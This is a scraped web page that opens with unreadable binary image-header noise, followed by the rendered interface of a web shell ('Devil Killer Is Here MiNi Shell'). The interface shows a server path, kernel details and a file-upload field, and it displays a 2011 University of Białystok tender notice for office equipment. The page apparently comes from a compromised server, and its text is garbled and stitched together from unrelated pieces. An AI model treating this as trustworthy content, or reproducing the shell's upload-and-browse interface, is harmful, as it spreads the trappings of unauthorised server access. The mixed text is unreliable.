JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110524/127142-N-2011.html

<p class="kh_header"><b>Białystok: Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla jednostek Uniwersytetu 
w Białymstoku- Dzp-22/D/2011</b><br>
<b>Numer ogłoszenia: 127142 - 2011; data zamieszczenia: 24.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet w Białymstoku , ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, woj. podlaskie, tel. 085 7457117, faks 085 745 70 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla jednostek Uniwersytetu 
w Białymstoku- Dzp-22/D/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla jednostek Uniwersytetu w Białymstoku w ilościach i wymaganiach określonych w Szczegółowym formularzu cenowym stanowiącym załącznik nr 2 do SIWZ. Zakres zamówienia został określony w zadaniach od 1 do 9.
Zakres zamówienia poniżej 193 000 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3, 30.19.14.00-8, 32.55.21.10-1, 32.55.00.00-3, 30.12.14.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał w niniejszym postępowaniu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - 
w tym okresie, wykonali lub wykonują przynajmniej dwa (2) zamówienia polegające na dostawie urządzeń biurowych tj.: kserokopiarek, niszczarek dokumentów, aparatów telefonicznych lub telefaksów, każde 
o wartości nie mniejszej niż:
dla zadania nr 1:             8 000,00 zł brutto	dla zadania nr 4,8:       30 000,00 zł brutto
dla zadania nr 2,3,5,7:   3 000,00 zł brutto	dla zadania nr 9:         10 000,00 zł brutto
a w przypadku składania oferty na kilka zadań, na kwotę odpowiadającą maksymalnej wartości tego zadania, którego wartość jest najwyższa, i wykażą spełnianie tego warunku poprzez podanie wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie;
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, 
o których mowa w pkt 6 SIWZ. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wskazane warunki. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>POSTANOWIENIA DOTYCZĄCE WNOSZENIA OFERTY WSPÓLNEJ PRZEZ DWÓCH LUB WIĘCEJ WYKONAWCÓW:
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum, spółka cywilna).
2)	W przypadku złożenia oferty przez podmioty występujące wspólnie, Wykonawcy ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być sporządzone tak jak zapisano w SIWZ 
w pkt 10 ppkt 19 OPIS SPOSOBU PRZYGOTOWANIA OFERT.
3)	Dokumenty ppkt 1) powinny być złożone przez każdy podmiot (każdy z Wykonawców wchodzących w skład konsorcjum lub spółki cywilnej), jeżeli odrębne przepisy wymagają wpisu do rejestru.
4)	Wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą wskazanym i upoważnionym 
w pełnomocnictwie przez pozostałych Wykonawców.	

Pkt 10 ppkt 19 SIWZ OPIS SPOSOBU PRZYGOTOWANIA OFERT:
Oferta wraz z załącznikami musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, 
w przypadku przedsiębiorcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze (lub np. w ewidencji działalności gospodarczej). Wskazane jest, aby do oferty Wykonawca załączył dokument lub pełnomocnictwo, z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli prawo to nie wynika z rejestru. W takiej sytuacji dokument lub pełnomocnictwo muszą być integralną częścią oferty:
a)	pełnomocnictwo powinno jednoznacznie określać zakres umocowania i wskazywać osobę pełnomocnika;
b)	w przypadku podmiotów występujących wspólnie w dokumencie pełnomocnictwa należy wskazać wszystkich  Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia, a każdy z nich powinien podpisać się pod tym dokumentem,
c)	spółka cywilna dołącza w/w pełnomocnictwo lub dokument, z którego wynika w/w pełnomocnictwo, kopie umowy spółki cywilnej lub uchwałę - poświadczone za zgodność z oryginałem.

PODMIOTY ZAGRANICZNE
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu lub dokumentów potwierdzających odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.uwb.edu.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet w Białymstoku, Dział Zamówień Publicznych ul. M. Skłodowskiej - Curie 14, 15-097 Białystok, piętro V, p. 503..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2011 godzina 09:30, miejsce: Uniwersytet w Białymstoku, Kancelaria Ogólna, ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, 
              piętro X, p. 1008..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że zamówienie częściowo realizowane jest ze środków Unii Europejskiej, tj.:
- zadanie nr 5 realizowane jest w ramach projektu Budowa Instytutu Biologii oraz Wydziału Matematyki 
i Informatyki wraz z Uniwersyteckim Centrum Obliczeniowym  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego.
- zadanie nr 6 realizowane jest w ramach projektu Usus est optimus magister - praktyka jest najlepszym nauczycielem współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Instytutu Matematyki, Instytutu Informatyki, Pełnomocnika Rektora d.s. Osób Niepełnosprawnych, Wydziału Filologicznego,
                                             Instytutu Biologii, Wydziału Pedagogiki i Psychologii, Wydziału Ekonomii i Zarządzania,
                                             Administracji Centralnej, Wydziału  Prawa Uniwersytetu w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Instytutu Matematyki przy ul. Akademickiej 2, Instytutu Informatyki przy ul. Sosnowej 64, Pełnomocnika Rektora d.s. Osób Niepełnosprawnych przy ul. Pogodnej 65, Wydziału Filologicznego przy Placu Uniwersyteckim 1, Instytutu Biologii przy ul. Świerkowej 20b, Wydziału Pedagogiki i Psychologii przy ul. Świerkowej 20, Wydziału Ekonomii 
i Zarządzania przy ul. Warszawskiej 63, Administracji Centralnej przy ul. M. Skłodowskiej-Curie 14, oraz Wydziału Prawa przy ul. Mickiewicza 1  w ilościach:
 Cyfrowy telefon bezsznurowy - 1 szt., telefon bezprzewodowy DECT - 8 szt., telefon bezprzewodowy - 3 szt., telefon stacjonarny - 9 szt., dodatkowa słuchawka do telefonu serii TG65xx - 4 szt., repeter (urządzenie zwiększające zasięg telefonów DECT) - 1 szt., telefon systemowy do centrali Ericsson MD110 - 2 szt., telefax laserowy - 2 szt., telefaks - 1 szt., toner do telefaksu - 4 szt., bęben do telefaksu - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 32.55.21.10-1, 32.55.00.00-3, 30.12.14.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Instytutu Chemii Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Instytutu Chemii przy ul. Hurtowej 1,  w ilościach:
 Kserokopiarka cyfrowa - 1 szt., toner do kserokopiarki cyfrowej - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Studium Praktycznej Nauki Języków Obcych Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Studium Praktycznej Nauki Języków Obcych przy ul. M. Skłodowskiej-Curie 14,  w ilościach:
 Kserokopiarka - 1 szt., toner do kserokopiarki - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Wydziału Ekonomii i Zarządzania Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Wydziału Ekonomii i Zarządzania przy ul. Warszawskiej 63,  w ilościach:
 Kopiarko-drukarka-skaner - 1 szt., toner do urządzenia - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Działu Zarządzania Projektami Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Działu Zarządzania Projektami przy ul. M. Skłodowskiej-Curie 14,  w ilościach:
 Urządzenie wielofunkcyjne - 1 szt., toner do urządzenia - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Wydziału Pedagogiki i Psychologii Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Wydziału Pedagogiki i Psychologii przy ul. Świerkowej 20,  w ilościach:
 Kserokopiarka (mono) - 1 szt., toner do kserokopiarki - 1 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                               dla Instytutu Biologii oraz Domu Studenta Nr 1 Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Instytutu Biologii przy ul. Świerkowej 20b,  Domu Studenta Nr 1 przy ul. Żeromskiego 1, w ilościach:
niszczarka - 3 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.19.14.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                                dla Pełnomocnika Rektora d.s. Osób Niepełnosprawnych na potrzeby jednostek 
                                               Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Pełnomocnika Rektora d.s. Osób Niepełnosprawnych na potrzeby jednostek Uniwersytetu w Białymstoku, 
w ilościach:
 niszczarka - 1 szt., kserokopiarka cyfrowa - 8 szt., toner do kserokopiarki cyfrowej - 8 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.19.14.00-8, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu 
                                                dla Administracji Centralnej Uniwersytetu w Białymstoku..</p>
